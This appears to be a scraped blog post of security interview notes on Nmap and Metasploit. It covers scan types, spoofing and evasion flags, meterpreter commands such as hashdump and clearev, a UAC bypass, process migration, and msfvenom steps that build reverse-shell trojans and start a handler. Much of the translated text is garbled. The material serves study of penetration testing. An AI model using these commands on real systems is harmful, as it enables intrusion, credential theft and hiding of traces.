当前位置:网站首页>【 Nmap and Metasploit common commands 】
【 Nmap and Metasploit common commands 】
2022-08-03 05:40:00 【A piece of paper - barren】
前言
网络安全面试题
题目
1.NMAP工具的原理,Commonly used parameters and principle
Nmap可以检测目标机是否在线、端口开放情况、侦测运行的服务类型及版本信息、侦测操作系统与设备类型等信息.
原理:
Nmap是LinuxUnder an open source free network discovery and security audit tools.It USES the originalIP报文来发现网络上有哪些主机,These hosts what services(应用程序名和版本),Service running on what operating system,它们使用什么类型的报文过滤器/防火墙,以及一些其他功能.
First of all, introduce several port state
端口的六个状态
open:端口是开放的
closed:端口是关闭的
filtered:端口被防火墙IDS/IPS屏蔽,无法确定其状态
unfiltered:端口没有被屏蔽,但是否开放需要进一步确定
open|filtered:端口是开放的或被屏蔽
closed|filtered:端口是关闭的或被屏蔽
Commonly used parameters and principle:
-sP/-sn:Ping扫描(不进行端口扫描)
-p:Specify the scan target port
-sT/-sS/-sA:TCP connect/TCP SYN/TCP ACK扫描
-sU:UDP扫描
-O:操作系统侦测
-sV:应用程序版本探测
-Pn: 将所有指定的主机视作开启的,跳过主机发现的过程
--dns-servers <serv1[,serv2],...>: 指定DNS服务器.
--system-dns: 指定使用系统的DNS服务器
--traceroute: 追踪每个路由节点
--packet-trace 追踪包
TCP SYN原理分析:
nmap -p 80 -sS [靶机IP]
Nmap向目标端口发送TCP SYN报文,If the target returnTCP SYN+ACK报文,Is the destination port in the open state,同时NmapWill then send the targetTCP RSTMessage to reset the connection;If the target returnTCP RST+ACK报文,Is the target port closed.
TCP connect原理分析:
nmap -p 80 -sT [靶机IP]
Nmap向目标端口发送TCP SYN报文,If the target returnTCP SYN+ACK报文,Is the destination port in the open state,同时NmapWill then send, in turn, the targetTCP ACK、TCP RST+ACKComplete the three-way handshake and reset the connection;If the target returnTCP RST+ACK报文,Is the target port closed.
TCP ACK原理分析:
nmap -p 80 -sA [靶机IP]
Nmap向目标端口发送TCP ACK报文,No matter whether the destination port in the open state,The target will returnTCP RST报文.如果NmapThe host can receive thisTCP RST报文,Is the destination port is not a firewall block.
TCP ACKScanning can only be used to determine whether the firewall blocking a port,可以辅助TCP SYN的方式来判断目标主机防火墙的状况.
其他功能:
规避FW/ID技术
-T(0-5) :Control of scanning quick break(0=最慢、5=最快)
nmap -T 3 x.x.x.x
-D : 源IP地址(Use any fakeIP) 欺骗.
nmap -D RND:3 x.x.x.x Three false randomIP去扫描
-sI: Choose a segment with freeIP做源IP去扫描–源IP欺骗.
nmap -sI 空闲IP x.x.x.x
–source-port 源端口欺骗
–spoof-mac 源mac欺骗
nmap --spoof-mac 0 x.x.x.x 随机MAC去扫描
nmap --spoof-mac aa:bb:cc:dd:ff:ee x.x.x.x 指定MAC扫描
nmap调用NSE脚本应用
脚本存放目录:/usr/share/nmap/scripts/
—参数:–script
–script vuln Scanning the existence of regular vulnerability
nmap --script vuln x.x.x.x
–script brute对数据库、smb、snmp简单的暴力破解
nmap --script brute x.x.x.x
2.MetasploitCommon modules and command
*exploits(渗透攻击/漏洞利用模块)
Infiltration attack module is to find security vulnerabilities using weakness or configuration of remote target to attack,以植入和运行攻击载荷,从而获得对远程目标系统访问的代码组件.流行的渗透攻击技术包括缓冲区溢出、Web应用程序漏洞攻击、用户配置错误等,其中包含攻击者或测试人员针对系统中的漏洞而设计的各种POC验证程序,As well as attack code for the destruction of system security,每个漏洞都有相应的攻击代码.
Infiltration attack module isMetasploitThe framework of the core functional components
*payloads(攻击载荷模块)
攻击载荷是我们期望目标系统在被渗透攻击之后完成实际攻击功能的代码,成功渗透目标后,用于在目标系统上运行任意命令或者执行特定代码.
Attack the load module from the simplest add user accounts、提供命令行Shell,Based on the graphicalVNC界面控制,And the most complicated、Have a lot of infiltration attack stage featuresMeterpreter,This makes penetrating the attacker can be selected after infiltration attack code,From many applicable load flexibility to choose his favorite module in assembly,After the infiltration attack for his chosen control session type,This modular design and flexible assembly model also penetrates the attacker provides great convenience for.
*auxiliary(辅助模块)
该模块不会直接在测试者和目标主机之间建立访问,它们只负责执行扫描、嗅探、指纹识别等相关功能以辅助渗透测试
网络主机存活扫描,Web目录扫描,FTP登录密码爆破
例如端口扫描:
search portscan
use 5 //tcp扫描模块
show options
set RHOSTS x.x.x.x //设置待扫描的IP地址、
set PORTS 1-500 //设置扫描端口范围、
set THREADS 20 //设置扫描线程,线程数量越高,扫描的速度越多
run
*nops(空指令模块)
空指令(NOP)是一些对程序运行状态不会造成任何实质性影响的空操作或无关操作指令.最典型的空指令就是空操作,在x86 CPU体系架构平台上的操作码是0x90.
在渗透攻击构造邪恶数据缓冲区时,Often to be executed in realShellcode之前添加一段空指令区.这样,Execute when the trigger infiltration attack after the jumpShellcode时,There will be a bigger safe landing area,从而避免受到内存地址随机化、返回地址计算偏差等原因造成的Shellcode执行失败.
Matasploit框架中的空指令模块就是用来在攻击载荷中添加空指令区,In order to improve the attacking the reliability of the component.
*encoders(编码器模块)
The encoder module through various forms of attack load code,Two big task:Will not appear in a load is to ensure that the attack should be avoided in the process of infiltration attack“坏字符”;The second is to attack load“免杀”处理,即逃避反病毒软件、IDS/IPSThe detecting and blocking
*post(后渗透攻击模块)
Infiltration attack module is mainly used in the target system in infiltration attack after the remote control,在受控系统中进行各式各样的后渗透攻击动作,比如获取敏感信息、Further horizontal development、实施跳板攻击等.
meterpreter常用命令
*pwd //查看当前工作目录
*sysinfo //查看系统信息
*getuid //获取当前权限的用户id
*ps //查看当前目标机上运行的进程列表和pid
*kill 2768 //杀死进程(pid)2768
*getsystem //获取system权限
*screenshot //截取目标主机当前屏幕
*hashdump //获取用户名与hash口令
*shell //获取目标主机shell
*upload //上传一个文件
*download //下载一个文件
*execute //执行目标系统中的文件(-f指定文件,-i执行可交互模式,-H隐藏窗口)
*clearev //清除日志
*background //将meterpreter放入后台(使用sessions-i重新连接到会话)
常用命令:
*TerminalTerminal under common commands
msfdb init //msf数据库初始化
msfdb delete //删除msfDatabase and stop using
msfdb start //启动msf数据库
msfdb stop //停止msf数据库
msfconsole //打开msf终端
*msfTerminal under common commands
db_status //查看msf数据库连接状态
db_nmap //调用nmap扫描,And in the database will scan results
search //The search module containing keywords
use //Choose to use a module
show payload //Show that the module supportpayload
show options //According to the module need to set the parameters of the
info //查看详细信息
set //After using the module,The value of the parameter setting module need(对应使用unsetCancel the set value)
back //Return to the superior status
exploit/run //Both command said running attack module
sessions //To view the current connection session
When using the osmosis module tometerpreter后
手动提权:
将session放到后台,使用local_exploit_suggester查询可用的exp
background
use local_exploit_suggester
show options
set session 4
run
bypass_uac(用户帐户控制)提权:
search bypassuac
ues exploit/windows/local/bypassuac
set payload windows/x64/meterpreter/reverse_tcp
set session 4
run
再进程迁移:
在刚获得 Meterpreter Shell时,该Shel是极其脆弱和易受攻击的,例如攻击者可以利用浏览器漏洞攻陷目标机器,但攻击渗透后浏览器有可能被用户关闭.所以第一步就是要移动这个 Shell把它和目标机中一个稳定的进程绑定在一起,而不需要对磁盘进行任何写入操作.这样做使得渗透更难被检测到.
使用自动迁移进程命令(run post/windows/manage/migrate)后,系统会自动寻找合适的进程然后迁移1
run post/windows/manage/migrate
Msfvenom (毒液)Make the Trojan and monitor online:
Method to generate Trojan:
win64系统:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxx -f exe > shell.exe.
win32系统:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxx -a x86 --platform Windows -f exe > shell.exe
Liunx系统:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxx -f elf > shell.elf
MacOS:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=x.x.x.x LPORT=xxx -f macho > shell.macho
Upload the Trojan to the target host:
#msfconsole
use exploit/multi/handler //加载模块
set payload android/meterpreter/reverse_tcp //选择Payload
show options //查看参数设置
set LHOST x.x.x.x //这里的地址设置成我们刚才生成木马的IP地址(kali的ip)
set LPORT xxx //这里的端口设置成刚才我们生成木马所监听的端口
exploit //开始执行漏洞,开始监听,等待上线
*evasion(规避模块)
Avoid module is mainly used to avoidWindows Defender防火墙、Windows应用程序控制策略(applocker)等的检查.
利用MetasploitFor common penetration testing flow
1.扫描目标机系统,寻找可用漏洞
2.Select and configure a penetrating attack(漏洞利用)模块(exploits)
3.选择并配置一个攻击载荷模块(payloads)
4.Select a coding technique(encoders),用来绕过杀毒软件的查杀
5.Perform penetration stage of the operation after infiltration attack
总结
This period mainly introducednmap和metasploit的相关知识
边栏推荐
猜你喜欢
随机推荐
【DC-4靶场渗透】
用pulp库解决运输问题【详细】
MySQL EXPLAIN 性能分析工具详解
NotImplementedError: file structure not yet supported
MySQL 一些函数
request.getParameter的结果为on
【DC-2靶场渗透】
传说中可“免费白拿”的无线路由器 - 斐讯 K2 最简单刷 breed 与第三方固件教程
Pr第三次培训笔记
处理异步事件的三种方式
取某一区间中素数的个数--洛谷P1865 A % B Problem
3588. 排列与二进制
OptionError: ‘Pattern matched multiple keys‘
【三子棋】7.25
-角谷猜想-
网络流媒体下载的 10 种方法(以下载 Echo 音乐为例)
自定义封装组件-国际化-下拉搜索
pta a.1030的dijkstra+DFS方法
Sentinel初次使用Demo测试
Flask Web 报错: